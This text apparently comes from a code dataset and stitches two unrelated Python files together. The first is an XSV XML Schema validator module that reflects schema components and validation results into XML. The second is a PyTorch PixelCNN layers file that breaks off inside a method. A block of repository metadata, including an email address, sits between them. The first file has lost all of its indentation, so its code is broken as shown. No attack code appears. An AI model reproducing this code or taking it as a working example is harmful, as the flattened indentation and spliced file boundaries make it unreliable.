# $Id: reflect.py,v 1.10 2005-08-10 20:32:08 ht Exp $
import types
from XSV.infoset import PSVInfoset
from XSV.infoset import XMLInfoset
from XSV.compile.List import List
from XSV.compile.Union import Union
from XSV.compile.ComplexType import ComplexType
from XSV.compile.Group import Group, ModelGroup
from XSV.compile.Particle import Particle
from XSV.compile.Wildcard import Wildcard
from XSV.compile.Element import Element
from XSV.compile.AttributeUse import AttributeUse
from XSV.compile.Attribute import Attribute
from XSV.compile.AttributeGroup import AttributeGroup
from XSV.compile.Annotation import Annotation
from XSV.compile.KCons import Kcons, Key, Keyref, Unique
from XSV.compile.AnyAttribute import AnyAttribute
from XSV.compile.AbInitio import AbInitio
from XSV.compile.DDummy import DumpedSchema, namespaceSchemaInformation
from XSV.compile.DDummy import contentType, namespaceConstraint, valueConstraint
from XSV.compile.DDummy import xpathTemp, schemaDocument
from XSV.compile.Facet import Facet
from XSV.compile.ListFacet import Pattern
from XSV.compile.Component import Component
from XSV.compile.AbInitio import AbInitio
from XSV.compile.SimpleType import SimpleType
from XSV.compile.Type import Type
from XSV.compile import XMLSchemaNS, simpleTypeMap, builtinPats
from XSV.compile.SchemaError import shouldnt
def setup():
List.reflectedName='list'
List.reflectionInMap=(('name','string',1,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('atomic','list'),'component',0,'basetype'),
('lvariety','aspecial',0,'varietyReflect'),
(('facet','enumeration','fractionDigits', 'minFractionDigits',
'precision', 'lexicalMappings','minInclusive',
'pattern','whiteSpace'),
'esspecial',0,'facetsReflect'),
('final','list',0,'final'),
(('atomic','list','union'),'component',1,'itemType'),
(('annotation',),'components',0,'annotations') # not per REC,
# but correct
)
List.reflectionOutMap=List.reflectionInMap
Union.reflectedName='union'
Union.reflectionInMap=(('name','string',1,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('atomic','union'),'component',0,'basetype'),
('uvariety','aspecial',0,'varietyReflect'),
(('facet','enumeration','fractionDigits', 'minFractionDigits',
'precision', 'lexicalMappings','minInclusive',
'pattern','whiteSpace'),
'esspecial',0,'facetsReflect'),
('final','list',0,'final'),
(('atomic','list'),'components',1,'memberTypes'),
(('annotation',),'components',0,'annotations') # not per REC,
# but correct
)
Union.reflectionOutMap=Union.reflectionInMap
ComplexType.reflectedName='complexTypeDefinition'
ComplexType.reflectionInMap=(('name','string',1,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('complexTypeDefinition','atomic','union','list'),
'component',1,'basetype'),
('derivationMethod','string',1,'derivationMethod'),
('final','list',0,'final'),
('abstract','boolean',0,'abstract'),
(('attributeUse',),'esspecial',1,'attributesReflect'),
(('attributeWildcard','wildcard'),
'especial',1,'attributeWildcardReflect'),
(('contentType',),'especial',0,'contentTypeReflect'),
('prohibitedSubstitutions','list',
0,'prohibitedSubstitutions'),
(('annotation',),'components',0,'annotations'))
ComplexType.reflectionOutMap=ComplexType.reflectionInMap
ModelGroup.reflectedName='modelGroupDefinition'
ModelGroup.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('annotation',),'component',1,'annotation'),
(('modelGroup',),'especial',0,'mgReflect'))
ModelGroup.reflectionOutMap=ModelGroup.reflectionInMap
Group.reflectedName='modelGroup'
Group.reflectionInMap=(('compositor','string',0,'compositor'),
(('particle',),
'components',0,'particles'),
(('annotation',),'component',1,'annotation'))
Group.reflectionOutMap=Group.reflectionInMap
Particle.reflectedName='particle'
Particle.reflectionInMap=(('minOccurs','string',0,'minOccurs'),
('maxOccurs','string',0,'maxOccurs'),
('minOccurs','aspecial',0,'occursReflect'), # hack,
# for rebuild only
(('elementDeclaration','wildcard','modelGroup'),
'component',0,'term'))
Particle.reflectionOutMap=Particle.reflectionInMap
Wildcard.reflectedName='wildcard'
Wildcard.reflectionInMap=((('namespaceConstraint',),'especial',
0,'wildcardNamespaceReflect'),
('processContents','string',0,'processContents'),
(('annotation',),'component',1,'annotation'))
Wildcard.reflectionOutMap=Wildcard.reflectionInMap
Element.reflectedName='elementDeclaration'
Element.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('complexTypeDefinition','atomic','union','list'),
'component',1,'typeDefinition'),
(('valueConstraint',),'especial',1,'vcReflect'),
('nillable','boolean',0,'nullable'),
('scope','aspecial',1,'scopeReflect'),
(('key','unique','keyref'),'esspecial',
0,'icsReflect'),
(('elementDeclaration',),
'component',1,'equivalenceClassAffiliation'),
('substitutionGroupExclusions','list',0,'final'),
('disallowedSubstitutions','list',
0,'prohibitedSubstitutions'),
('abstract','boolean',0,'abstract'),
(('annotation',),'component',1,'annotation'))
Element.reflectionOutMap=Element.reflectionInMap
AttributeUse.reflectedName='attributeUse'
AttributeUse.reflectionInMap=(('required','boolean',0,'minOccurs'),
(('attributeDeclaration',),'component',
0,'attributeDeclaration'),
(('valueConstraint',),'especial',1,'vcReflect'))
AttributeUse.reflectionOutMap=AttributeUse.reflectionInMap
Attribute.reflectedName='attributeDeclaration'
Attribute.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
('scope','aspecial',1,'scopeReflect'),
(('atomic','list','union'),'component',1,'typeDefinition'),
(('valueConstraint',),'especial',1,'vcReflect'),
(('annotation',),'component',1,'annotation'))
Attribute.reflectionOutMap=Attribute.reflectionInMap
AttributeGroup.reflectedName='attributeGroupDefinition'
AttributeGroup.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('attributeUse',),'esspecial',1,'attributesReflect'),
(('attributeWildcard','wildcard'),
'especial',1,'attributeWildcardReflect'),
(('annotation',),'component',1,'annotation'))
AttributeGroup.reflectionOutMap=AttributeGroup.reflectionInMap
Annotation.reflectedName='annotation'
Annotation.reflectionInMap=((('XML.Element',),'components',0,'appinfo'),
(('XML.Element',),'components',0,'documentation'),
(('XML.Attribute',),'components',0,'attrs'))
Annotation.reflectionOutMap=Annotation.reflectionInMap
Key.reflectedName=Key.cname
Keyref.reflectedName=Keyref.cname
Unique.reflectedName=Unique.cname
Kcons.reflectionInMap=(('name','string',0,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('selector','xpath'),'especial',0,'selectorReflect'),
(('fields','xpath'),'especial',0,'fieldsReflect'),
(('key',),'component',1,'refer'),
(('annotation',),'component',1,'annotation'))
Kcons.reflectionOutMap=Kcons.reflectionInMap
AnyAttribute.reflectedName='wildcard'
AbInitio.reflectedName='atomic'
AbInitio.reflectionInMap=(('name','string',1,'name'),
('targetNamespace','string',1,'targetNamespace'),
(('atomic',),'component',0,'basetype'),
(('atomic',),'component',0,'primitiveType'),
(('facet','enumeration','fractionDigits', 'minFractionDigits',
'precision', 'lexicalMappings', 'minInclusive',
'pattern','whiteSpace'),
'esspecial',0,'facetsReflect'),
# XXX
(('fundamentalFacet',),'esspecial',0, 'fundamentalFacetsReflect'),
# XXX
('final','list',0,'final'),
(('annotation',),'components',0,'annotations') # not per REC,
# but correct
)
AbInitio.reflectionOutMap=AbInitio.reflectionInMap
DumpedSchema.reflectionInMap=((('namespaceSchemaInformation',),
'components',0,'schemaInformation'),)
DumpedSchema.reflectionOutMap=DumpedSchema.reflectionInMap
namespaceSchemaInformation.reflectionInMap=((('elementDeclaration', 'complexTypeDefinition',
'atomic','union','list','attributeDeclaration',
'modelGroupDefinition','attributeGroupDefinition',
'schemaDocument'),
'components',0,'components'),
('schemaNamespace','string',0,'schemaNamespace'))
namespaceSchemaInformation.reflectionOutMap=namespaceSchemaInformation.reflectionInMap
contentType.reflectionInMap=(('variety','string',1,'variety'),
(('atomic','union','list','particle'),'component',1,'model'))
contentType.reflectionOutMap=contentType.reflectionInMap
namespaceConstraint.reflectionInMap=(('variety','string',0,'variety'),
('namespaces','list',1,'namespaces'))
namespaceConstraint.reflectionOutMap=namespaceConstraint.reflectionInMap
valueConstraint.reflectionInMap=(('variety','string',0,'variety'),
('value','string',0,'value'))
valueConstraint.reflectionOutMap=valueConstraint.reflectionInMap
xpathTemp.reflectionInMap=(('path','string',0,'path'),)
xpathTemp.reflectionOutMap=xpathTemp.reflectionInMap
schemaDocument.reflectionInMap=(('documentLocation','string',0,'documentLocation'),)
schemaDocument.reflectionOutMap=schemaDocument.reflectionInMap
Facet.reflectionInMap=(('value','string',0,'value'),
('fixed','boolean',0,'fixed'))
Facet.reflectionOutMap=Facet.reflectionInMap[0:1]
simpleTypeMap.update({'list':List,
'union':Union,
'atomic':AbInitio})
InformationItem = XMLInfoset.InformationItem
Document = XMLInfoset.Document
Namespace = XMLInfoset.Namespace
xsiNamespace = XMLInfoset.xsiNamespace
infosetSchemaNamespace = XMLInfoset.infosetSchemaNamespace
psviSchemaNamespace = PSVInfoset.psviSchemaNamespace
def informationitemReflect(self, parent=None):
XMLInfoset.Element(parent, infosetSchemaNamespace, "XXX")
InformationItem.reflect=informationitemReflect
def reflectString(self, parent, name, value, nullable, ns=None):
if value is None:
if not nullable:
help()
else:
attr = XMLInfoset.Attribute(parent, ns, name, None, value)
parent.addAttribute(attr)
InformationItem.reflectString=reflectString
def reflectNull(self, parent, name, ns=None):
e = XMLInfoset.Element(parent, ns or infosetSchemaNamespace, name)
parent.addChild(e)
nullAttr = XMLInfoset.Attribute(e, xsiNamespace, "nil", None, "true")
e.addAttribute(nullAttr)
InformationItem.reflectNull=reflectNull
def reflectBoolean(self, parent, name, value, nullable, ns=None):
# sys.stderr.write("reflecting boolean %s, nullable=%s\n" % (value, nullable))
if value != None:
if value:
value = "true"
else:
value = "false"
self.reflectString(parent, name, value, nullable)
InformationItem.reflectBoolean=reflectBoolean
def documentReflect(self, parent=None, control=0):
doc = Document(None, None, "yes")
document = XMLInfoset.Element(doc, infosetSchemaNamespace, "document", None, None,
{None:Namespace(None, infosetSchemaNamespace),
"i":Namespace("i", xsiNamespace),
"xs":Namespace("xs",
"http://www.w3.org/2001/XMLSchema"),
"xml":Namespace("xml",
"http://www.w3.org/XML/1998/namespace")})
doc.addChild(document)
self.children[0].reflect(document)
for e in self.unparsedEntities:
e.reflect(document)
for n in self.notations:
n.reflect(document)
self.reflectString(document, "baseURI", self.baseURI, 1)
self.reflectString(document, "characterEncodingScheme", self.characterEncodingScheme, 1)
self.reflectString(document, "standalone", self.standalone, 1)
self.reflectString(document, "version", self.version, 1)
self.reflectBoolean(document, "allDeclarationsProcessed", self.allDeclarationsProcessed, 0)
return doc
Document.reflect=documentReflect
def elementReflect(self, parent,dumpChars=1):
element = XMLInfoset.Element(parent, infosetSchemaNamespace, "element")
parent.addChild(element)
self.reflectString(element, "namespaceName", self.namespaceName, 1)
self.reflectString(element, "localName", self.localName, 0)
self.reflectString(element, "prefix", self.prefix, 1)
for a in self.attributes.values():
a.reflect(element)
if self.namespaceAttributes:
for a in self.namespaceAttributes.values():
a.reflect(element)
for c in self.children:
if (not dumpChars) and isinstance(c,XMLInfoset.Characters):
pass
c.reflect(element)
if self.inScopeNamespaces:
for a in self.inScopeNamespaces.values():
a.reflect(element)
self.reflectString(element, "baseURI", self.baseURI, 1)
return element
XMLInfoset.Element.reflect=elementReflect
def charactersReflect(self, parent):
tt=XMLInfoset.Element(parent,infosetSchemaNamespace,"text")
parent.addChild(tt)
self.reflectString(tt,"content",self.characters,0)
XMLInfoset.Characters.reflect=charactersReflect
def attributeReflect(self, parent=None):
attribute = XMLInfoset.Element(parent, infosetSchemaNamespace, "attribute")
parent.addChild(attribute)
self.reflectString(attribute, "namespaceName", self.namespaceName, 1)
self.reflectString(attribute, "localName", self.localName, 0)
self.reflectString(attribute, "prefix", self.prefix, 1)
self.reflectString(attribute, "normalizedValue", self.normalizedValue, 1)
self.reflectBoolean(attribute, "specified", self.specified, 0)
self.reflectString(attribute, "attributeType", self.attributeType, 1)
self.reflectString(attribute, "references", None, 1) # not implemented
return attribute
XMLInfoset.Attribute.reflect=attributeReflect
def namespaceReflect(self, parent=None):
namespace = XMLInfoset.Element(parent, infosetSchemaNamespace, "namespace")
parent.addChild(namespace)
self.reflectString(namespace, "prefix", self.prefix, 1)
self.reflectString(namespace, "namespaceName",
self.namespaceName, 0)
Namespace.reflect=namespaceReflect
def nsiReflect(self, parent=None):
nsi = XMLInfoset.Element(parent, psviSchemaNamespace, "namespaceSchemaInformation")
parent.addChild(nsi)
self.reflectString(nsi, "schemaNamespace", self.schemaNamespace, 1)
for c in self.schemaComponents:
c.reflect(nsi,1)
for d in self.schemaDocuments:
d.reflect(nsi)
for a in self.schemaAnnotations:
a.reflect(nsi)
PSVInfoset.NamespaceSchemaInformation.reflect=nsiReflect
def sdReflect(self, parent=None):
sd = XMLInfoset.Element(parent, psviSchemaNamespace, "schemaDocument")
parent.addChild(sd)
self.reflectString(sd, "documentLocation", self.documentLocation, 1)
PSVInfoset.schemaDocument.reflect=sdReflect
def componentReflect(self,parent,forceFull=0,noID=0):
if self.uid and not forceFull:
# a pointer
self.reflectAsPointer(self.uid,parent)
else:
e = XMLInfoset.Element(parent, psviSchemaNamespace, self.reflectedName)
parent.addChild(e)
if self.needsId and not forceFull:
self.assignUid()
if self.uid and not noID:
idAttr = XMLInfoset.Attribute(e, None, "id", None, self.uid)
e.addAttribute(idAttr)
for rme in self.reflectionOutMap:
# reflectionMap entries: (compPropertyName,valueType,nullable,
# pythonPropertyName)
# print ('rme',rme)
value=getattr(self,rme[3])
# print ('vv',self,value)
if rme[1]=='string':
e.reflectString(e,rme[0],value,
rme[2])
elif rme[1]=='list':
if len(value)>0:
e.reflectString(e,rme[0],' '.join(value),rme[2])
elif rme[1]=='boolean':
if str(value) not in ('true','false'):
if value:
value='true'
else:
value='false'
e.reflectString(e,rme[0],value,
rme[2])
elif rme[1]=='component':
if value is not None:
value.reflect(e)
elif rme[2]:
pass
elif rme[1] in ('aspecial','especial','esspecial'):
value(e)
elif rme[1]=='components':
if value is None and rme[2]:
continue
for vv in value or []:
vv.reflect(e)
def reflectAsPtr(self,ref,parent,eltName,eltns=psviSchemaNamespace):
c = XMLInfoset.Element(parent, eltns, eltName)
parent.addChild(c)
refAttr = XMLInfoset.Attribute(c, None, "ref", None, ref)
c.addAttribute(refAttr)
nilAttr = XMLInfoset.Attribute(c, xsiNamespace, "nil", None, "true")
c.addAttribute(nilAttr)
if self.alwaysNamed:
nAttr = XMLInfoset.Attribute(c, None, "name", None, self.name)
c.addAttribute(nAttr)
if self.targetNamespace is not None:
nsAttr = XMLInfoset.Attribute(c, None, "tns", None, self.targetNamespace)
c.addAttribute(nsAttr)
def reflectAIAsPointer(self,ref,parent):
return reflectAsPtr(self,ref,parent,"atomic")
def reflectCompAsPointer(self, ref, parent=None):
return reflectAsPtr(self,ref,parent,self.reflectedName)
Component.reflectAsPointer=reflectCompAsPointer
AbInitio.reflectAsPointer=reflectAIAsPointer
Component.reflect=componentReflect
Component.needsId=0
Component.alwaysNamed=0
AbInitio.alwaysNamed=0
ComplexType.needsId=1 # only nested Elts, Attrs, CTs and STs need Ids
SimpleType.needsId=1
Element.needsId=1
Attribute.needsId=1
Pattern.needsId=1 # because they have big patterns
Pattern.uids=None
Attribute.alwaysNamed=1 # Because typelocal-table is built right away
Kcons.needsId=1
def modelReflect(self,parent,forceFull=0,noID=0):
tick=0
if self.name:
if (not forceFull) and self.id:
# forward reference to model group defn
self.reflectedName='modelGroup'
tick=1
else:
self.reflectionOutMap=ModelGroup.reflectionOutMap
Component.reflect(self,parent,forceFull,noID)
if tick:
self.reflectedName='modelGroupDefinition'
Group.reflect=modelReflect
allPrefixes={'xsd':XMLSchemaNS,
'xsi':xsiNamespace}
allNSs={xsiNamespace:'xsi',
XMLSchemaNS:'xsd'}
def assignUid(self):
cnn=None
nn=self.name
if self.targetNamespace:
if allNSs.has_key(self.targetNamespace):
cnn="%s.."%allNSs[self.targetNamespace]
elif (self.xrpr and self.xrpr.elt and self.xrpr.elt.namespaceDict):
for (n,v) in self.xrpr.elt.namespaceDict.items():
# note that this namespaceDict is a Mapper hack from layer.py
if v==self.targetNamespace:
if n!=None and (not allPrefixes.has_key(n)):
allNSs[self.targetNamespace]=n
allPrefixes[n]=self.targetNamespace
cnn="%s.."%n
break
if cnn:
if ((isinstance(self,Element) or
isinstance(self,Attribute)) and self.scope!='global'):
# avoid spurious conflicts
nn="%s.%s"%(nn,self.id)
else:
n="x%d"%self.id
allNSs[self.targetNamespace]=n
allPrefixes[n]=self.targetNamespace
cnn="%s.."%n
else:
cnn=""
if nn:
nn="%s.%s"%(nn,self.id)
self.uid="%s%s.%s"%(cnn,self.kind,nn or "_anon_%s"%self.id)
Component.uid=None
Component.assignUid=assignUid
Type.kind='type'
Element.kind='elt'
Attribute.kind='attr'
Group.kind='mg'
AttributeGroup.kind='ag'
Kcons.kind='idCons'
Facet.kind='f'
Pattern.reflectedName='pattern'
# Notation.kind='ntn'
def abInitioReflect(self,parent,force=0):
if force:
e = XMLInfoset.Element(parent, psviSchemaNamespace, 'atomic')
parent.addChild(e)
idAttr = XMLInfoset.Attribute(e, None, "id", None, self.uid)
e.addAttribute(idAttr)
nullAttr = XMLInfoset.Attribute(e, xsiNamespace, "nil", None, "true")
e.addAttribute(nullAttr)
else:
# a pointer
self.reflectAsPointer(self.uid,parent)
AbInitio.reflect=abInitioReflect
def aiAssign(self):
self.uid=self.name
AbInitio.assignUid=aiAssign
AbInitio.uid=None
def scopeReflect(self,parent):
if self.scope is not None:
if self.scope=='global':
parent.reflectString(parent,'scope','global',0)
else:
parent.reflectString(parent,'scope','local',0)
Element.scopeReflect=scopeReflect
Attribute.scopeReflect=scopeReflect
def vcReflect(self,parent):
if self.valueConstraint is not None:
vc=XMLInfoset.Element(parent,psviSchemaNamespace,'valueConstraint')
parent.addChild(vc)
vc.reflectString(vc,'variety',self.valueConstraint[0],
1)
vc.reflectString(vc,'value',self.valueConstraint[1],
0)
Element.vcReflect=vcReflect
Attribute.vcReflect=vcReflect
AttributeUse.vcReflect=vcReflect
def icsReflect(self,parent):
for kd in self.keys:
kd.reflect(parent)
for ud in self.uniques:
ud.reflect(parent)
for krd in self.keyrefs:
krd.reflect(parent)
Element.icsReflect=icsReflect
def adReflect(self,parent):
tab={}
for ad in self.attributeDeclarations:
ad.expand(tab)
for vv in tab.values():
vv.reflect(parent)
AttributeGroup.adReflect=adReflect
def mgReflect(self,parent):
self.reflectionOutMap=Group.reflectionOutMap
self.reflectedName='modelGroup'
name=self.name # stop recursion
self.name=None
self.reflect(parent,1,1)
self.name=name
Group.mgReflect=mgReflect
def wnsReflect(self,parent):
ns=XMLInfoset.Element(parent,psviSchemaNamespace,'namespaceConstraint')
parent.addChild(ns)
if self.allowed=='##any':
ns.reflectString(ns, 'variety', 'any', 0)
else:
if self.negated:
ns.reflectString(ns, 'variety', 'negative', 0)
else:
ns.reflectString(ns, 'variety', 'positive', 0)
if len(self.namespaces)>0:
ns.reflectString(ns,'namespaces',' '.join(map(lambda n:n or '##none',
self.namespaces)),0)
Wildcard.wildcardNamespaceReflect=wnsReflect
def ctReflect(self,parent):
if self.contentType is not None:
ct=XMLInfoset.Element(parent,psviSchemaNamespace,'contentType')
parent.addChild(ct)
if self.contentType=='empty':
ct.reflectString(ct, 'variety','empty',0)
elif self.contentType in ('elementOnly','mixed'):
ct.reflectString(ct, 'variety',self.contentType,0)
self.model.reflect(ct)
else:
ct.reflectString(ct, 'variety','simple',0)
self.model.reflect(ct)
ComplexType.contentTypeReflect=ctReflect
def attrsReflect(self,parent):
for au in self.attributeDeclarations.values():
if isinstance(au.attributeDeclaration,Attribute):
au.reflect(parent)
ComplexType.attributesReflect=attrsReflect
def agAttrsReflect(self,parent):
for au in self.attributeDeclarations:
if isinstance(au.attributeDeclaration,Attribute):
au.reflect(parent)
AttributeGroup.attributesReflect=agAttrsReflect
def awReflect(self,parent):
# wc=None
# for ad in self.attributeDeclarations.values():
# if isinstance(ad.attributeDeclaration,Wildcard):
# wc=ad.attributeDeclaration
# break
if self.attributeDeclarations.has_key('#any'):
self.attributeDeclarations['#any'].attributeDeclaration.reflect(parent)
ComplexType.attributeWildcardReflect=awReflect
def agAwReflect(self,parent):
for au in self.attributeDeclarations:
if isinstance(au.attributeDeclaration,Wildcard):
au.attributeDeclaration.reflect(parent)
return
AttributeGroup.attributeWildcardReflect=agAwReflect
def selReflect(self,parent):
selp=XMLInfoset.Element(parent,psviSchemaNamespace,'xpath')
parent.addChild(selp)
selp.reflectString(selp, 'path',self.selector.str,0)
Kcons.selectorReflect=selReflect
def referReflect(self,parent):
self.reflectAsPointer(self.refer, parent, 'referencedKey')
Kcons.referReflect=referReflect
def fsReflect(self,parent):
for f in self.fields:
xp=XMLInfoset.Element(parent,psviSchemaNamespace,'xpath')
parent.addChild(xp)
xp.reflectString(xp, 'path',f.str,0)
Kcons.fieldsReflect=fsReflect
def ptReflect(self,parent):
if self.primitiveType is not None:
self.primitiveType.reflectAsPointer(self.primitiveType.name,parent)
SimpleType.primitiveTypeReflect=ptReflect
def facetsReflect(self,parent):
if self.variety=='atomic':
auth=self.primitiveType
elif self.variety=='list':
auth=List
elif self.variety=='union':
auth=Union
else:
shouldnt('bogusv: %s'%self.variety)
for fn in auth.allowedFacets:
if self.facets.has_key(fn):
facet=self.facets[fn]
else:
facet=None
if (facet is not None and facet.value is not None):
fval=facet.value
if type(fval)==types.ListType:
if fn=='pattern': # hack to save megaspace
if facet.uids is not None:
# a pointer
for uid in facet.uids:
facet.reflectAsPointer(uid,parent)
else:
if facet.uids is None:
facet.id=facet.fid
facet.assignUid()
n=1
facet.uids=[]
for vl in fval:
if vl in builtinPats:
nuid="bip..%d"%builtinPats.index(vl)
facet.reflectAsPointer(nuid,parent)
else:
f=facetReflect(parent,fn,vl)
nuid="%s..%d"%(facet.uid,n)
idAttr = XMLInfoset.Attribute(f, None, "id", None, nuid)
f.addAttribute(idAttr)
facet.uids.append(nuid)
n=n+1
else:
for vl in fval:
f=facetReflect(parent,fn,vl)
else:
f=facetReflect(parent,fn,fval)
f.reflectBoolean(f,"fixed",facet.fixed,0)
if facet.annotation is not None:
# note hack for list-vals -- annotation on last one
facet.annotation.reflect(f)
def facetReflect(parent,name,value):
f=XMLInfoset.Element(parent,psviSchemaNamespace,name)
parent.addChild(f)
if value is not None:
if name=="precision":
if value:
value="true"
else:
value="false"
elif name=="lexicalMappings":
value=" ".join(value)
elif type(value) not in (types.StringType,types.UnicodeType):
value=str(value)
if len(value) > 0:
if type(value) not in (types.StringType,types.UnicodeType):
value=str(value)
f.reflectString(f,"value",value,0)
return f
SimpleType.facetsReflect=facetsReflect
def fundamentalFacetsReflect(self,parent):
pass
# XXX
SimpleType.fundamentalFacetsReflect=fundamentalFacetsReflect
def elementReflect(self, parent=None):
# sys.stderr.write("using new reflect on %s, %s\n" % (self,parent));
# sys.stderr.write("%s" % self.__dict__);
if self.schemaInformation is not None:
# we are a validation start, so we need an ID _before_ recursion
self.id=gensym().id # for others to point to
# we need to build all the top-level defns also
# two passes -- assign names, to avoid internal defn's of named stuff
assignAllUIDs(self.schemaInformation)
if self.schemaNormalizedValue:
mixed=0
elif self.typeDefinition:
mixed=self.typeDefinition.contentType=='mixed'
else:
mixed=1
element = self.oldReflect(parent,mixed)
if self.schemaInformation is not None:
element.addAttribute(XMLInfoset.Attribute(element, None, "id", None, self.id))
reflectAllComponents(element,self.schemaInformation)
self.reflectString(element, "validationAttempted",
self.validationAttempted, 1,
psviSchemaNamespace)
if self.validationContext is not None:
self.reflectString(element,"validationContext",self.validationContext.id,0,
psviSchemaNamespace)
self.reflectString(element, "validity", self.validity, 1,
psviSchemaNamespace)
if self.errorCode:
self.reflectString(element,
"schemaErrorCode",'\n'.join(self.errorCode),1,
psviSchemaNamespace)
self.reflectString(element, "schemaNormalizedValue", self.schemaNormalizedValue, 1,
psviSchemaNamespace)
if self.typeDefinition: # XXX
self.typeDefinition.reflect(element)
self.reflectString(element, "memberTypeDefinition", self.memberTypeDefinition, 1,
psviSchemaNamespace)
if self.elementDeclaration is not None:
self.elementDeclaration.reflect(parent)
self.reflectBoolean(element, "nil", self.null, 1,
psviSchemaNamespace)
XMLInfoset.Element.psvReflect = elementReflect
class gensym:
nextid = 1
def __init__(self):
self.id = "g%s" % gensym.nextid
gensym.nextid = gensym.nextid + 1
def reflectAllComponents(element,schemaInformation):
for i in schemaInformation:
i.reflect(element)
def assignAllUIDs(schemaInformation):
for i in schemaInformation:
for c in i.schemaComponents:
if (isinstance(c,Component) or
isinstance(c,AbInitio)):
c.assignUid()
def attributeReflect(self, parent=None):
attribute = self.oldReflect(parent)
self.reflectString(attribute, "validationAttempted",
self.validationAttempted, 1,
psviSchemaNamespace)
if self.validationContext is not None:
self.reflectString(attribute,
"validationContext",self.validationContext.id,0,
psviSchemaNamespace)
self.reflectString(attribute, "validity", self.validity, 1,
psviSchemaNamespace)
if self.errorCode:
self.reflectString(attribute,
"schemaErrorCode",'\n'.join(self.errorCode),1,
psviSchemaNamespace)
self.reflectString(attribute, "schemaNormalizedValue", self.schemaNormalizedValue, 1,
psviSchemaNamespace)
if self.typeDefinition is not None: # XXX
self.typeDefinition.reflect(attribute)
self.reflectString(attribute, "memberTypeDefinition", self.memberTypeDefinition, 1,
psviSchemaNamespace)
if self.attributeDeclaration is not None:
self.attributeDeclaration.reflect(attribute)
XMLInfoset.Attribute.psvReflect = attributeReflect
XMLInfoset.Element.oldReflect = XMLInfoset.Element.reflect
XMLInfoset.Element.reflect = XMLInfoset.Element.psvReflect
XMLInfoset.Attribute.oldReflect = XMLInfoset.Attribute.reflect
XMLInfoset.Attribute.reflect = XMLInfoset.Attribute.psvReflect
# $Log: reflect.py,v $
# Revision 1.10 2005-08-10 20:32:08 ht
# comment
#
# Revision 1.9 2004/10/04 11:36:47 ht
# token support for pDecimal
#
# Revision 1.8 2004/08/18 08:44:38 ht
# dump patterns properly
#
# Revision 1.7 2003/04/01 18:46:10 ht
# allow (but ignore) control arg to reflect doc
#
# Revision 1.6 2002/11/25 14:57:33 ht
# get fake variety early
#
# Revision 1.5 2002/10/08 20:32:16 ht
# fix one more XMLInfoset qualification, remove pointless statement
#
# Revision 1.4 2002/09/23 21:45:03 ht
# move to string methods from string library
#
# Revision 1.3 2002/09/23 14:03:14 ht
# fix an attr group dumping bug,
# set up so pattern facets are shared where possible to save on big built-in patterns
#
# Revision 1.2 2002/08/21 08:58:05 ht
# simpleTypeMap hack, attr bug
#
# Revision 1.1 2002/06/28 09:46:07 ht
# part of package now
#
|
[
"ahmed@manhag.org"
] |
ahmed@manhag.org
|
f291c903c72585e9ca8089e497ba10907c373013
|
67af9dc77608a6cd83fdf219b3b76000634c0634
|
/pixelcnn/layers.py
|
dab5d229536d0e0e042a5d70968fb13802ee7c03
|
[
"Apache-2.0"
] |
permissive
|
kngwyu/pytorch-pixelcnn
|
7b4d0bb0e8662ce976b5faede41249b94d81e03c
|
e59585d5d533de77c7b51a8e822da0264f2b56e5
|
refs/heads/master
| 2020-06-01T00:23:54.716580
| 2019-08-12T05:44:29
| 2019-08-12T05:44:29
| 190,556,770
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,522
|
py
|
import torch
from torch import nn, Tensor
from torch.nn import functional as F
from torch.nn.utils import weight_norm
from typing import Callable, Optional, Tuple
from .utils import down_cut, right_cut
class ConcatELU(nn.Module):
__constants__ = ['alpha']
def __init__(self, alpha: float = 1.) -> None:
super().__init__()
self.alpha = alpha
def forward(self, x: Tensor) -> Tensor:
return F.elu(torch.cat((x, -x), dim=1), self.alpha, inplace=True)
def extra_repr(self):
return 'alpha={}'.format(self.alpha)
class DownShiftedConv2d(nn.Module):
def __init__(
self,
in_channel: int,
out_channel: int,
kernel: Tuple[int, int] = (2, 3),
stride: int = 1,
right_shift: bool = False,
) -> None:
super().__init__()
kh, kw = kernel
# pad: (Left, Right, Top, Bottom)
pad = (kw - 1, 0, kh - 1, 0) if right_shift else ((kw - 1) // 2, (kw - 1) // 2, kh - 1, 0)
self.pad = nn.ZeroPad2d(pad)
self.conv = weight_norm(nn.Conv2d(in_channel, out_channel, kernel, stride))
def forward(self, x: Tensor) -> Tensor:
x = self.pad(x)
x = self.conv(x)
return x
class DownShiftedDeconv2d(nn.Module):
def __init__(
self,
in_channel: int,
out_channel: int,
kernel: Tuple[int, int] = (2, 3),
stride: int = 1,
right_shift: bool = False,
) -> None:
super().__init__()
if stride != 1 and stride != 2:
raise ValueError('Only 1 or 2 is allowed as stride size for DownShiftedDeconv2d')
pad = 0 if stride == 1 else 1
deconv = nn.ConvTranspose2d(in_channel, out_channel, kernel, stride, output_padding=pad)
self.deconv = weight_norm(deconv)
self.kernel = kernel
self.scaler = right_cut if right_shift else down_cut
def forward(self, x: Tensor) -> Tensor:
x = self.deconv(x)
return self.scaler(x, *self.kernel)
class Conv1x1(nn.Module):
def __init__(self, in_channel: int, out_channel: int) -> None:
super().__init__()
self.conv = weight_norm(nn.Conv2d(in_channel, out_channel, kernel_size=1))
def forward(self, x: Tensor) -> Tensor:
return self.conv(x)
class GatedResNet(nn.Module):
def __init__(
self,
in_channel: int,
conv: Callable[[int, int], nn.Module],
nonlinearity: nn.Module = ConcatELU(),
aux_enlargement: int = 0,
) -> None:
super().__init__()
nl_enlargement = 2 if isinstance(nonlinearity, ConcatELU) else 1
self.conv1 = conv(in_channel * nl_enlargement, in_channel)
if aux_enlargement == 0:
self.skip_op = None
else:
self.skip_op = Conv1x1(nl_enlargement * aux_enlargement * in_channel, in_channel)
self.nonlinearity = nonlinearity
self.dropout = nn.Dropout2d(0.5)
self.conv2 = conv(nl_enlargement * in_channel, nl_enlargement * in_channel)
def forward(self, x_orig: Tensor, aux: Optional[Tensor] = None) -> Tensor:
x = self.conv1(self.nonlinearity(x_orig))
if aux is not None and self.skip_op is not None:
